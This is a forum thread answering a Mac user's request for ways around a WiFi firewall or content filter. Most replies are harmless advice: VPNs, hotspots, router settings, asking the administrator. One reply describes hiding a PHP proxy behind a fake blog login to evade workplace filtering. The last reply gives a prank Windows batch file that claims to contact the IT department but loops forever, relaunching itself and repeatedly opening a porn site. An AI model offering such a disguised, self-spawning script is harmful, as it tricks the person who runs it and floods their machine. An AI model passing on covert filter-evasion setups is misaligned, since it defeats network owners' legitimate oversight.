What's the best web based proxy or program to get around this firewall I'm currently on?
The WiFi I'm on is blocking half the websites I'm trying to get to and basically all media. I'm on a mac. |

Is this at home? put your ip into the search bar and access the settings. You might be able to change the blockage there.

Are you talking about a firewall at work or somewhere other than your house? You need a proxy. How computer savvy you are will determine the best course of action but I recommend running a Raspberry Pi with Apache and PHP Proxy.

Pay for your own WiFi where you don't have to abide by the rules set forth by the owner of the equipment you're currently using.

Probably not the firewall, it is probably a proxy server. Depending on which proxy and how it is setup you may not be able to get around it.
Use a wireless hotspot.

That's simply unacceptable. Those silly rules and liability issues can be damned, this man has a need for free internet. |

Setup a VPN to a proxy server. If you have an active IT department don't be surprised when that gets shut down.
|
|
[#28]
A lot of filtering software also blocks web proxies. If you have a hosting account somewhere you can roll your own or get someone to do this for you.
- Make a generic blog or something - Put a simple php web proxy behind a login. Make no mention of the word proxy. Make sure it obfuscates the url's you're loading and encrypts the traffic. - Watch porn at work Since it's behind a login, none of the normal filtering software will pick it up and you'll have a free proxy for life. |

Are you at work? or at say a hotel?
If you are at work I would say the filtering is there for a reason and you shouldn't mess with it esp. if you like your job. At a hotel I would suggest one of the inexpensive VPNs that people use for torrenting. That should work. |

I think the best bet would be to get the attention of the person who administers to the next access, and when they finally come around to see what's going on, you have a nice chat with them and persuade them to remove or create exceptions from the filter for the sites you'd like to visit.
Step 1. Open Notepad.exe Step 2. Cut n Paste the following text into Notepad.exe @echo off
color 0a echo Contacting IT Dept. for some help! Let this run! Pushd "%~dp0" :q iexplore.exe http://www.brazzers.com title Helpme%random%a timeout /t 2 /nobreak >nul start helpme.bat goto q View Quote Step 3. Under "File" and "Save As", save the above text as "Helpme.bat". Step 4. Double-click on the newly made Helpme.bat file you just made. Icon should look like a little file with some gears in it. I'm sure someone will come speak to you sooner or later. |
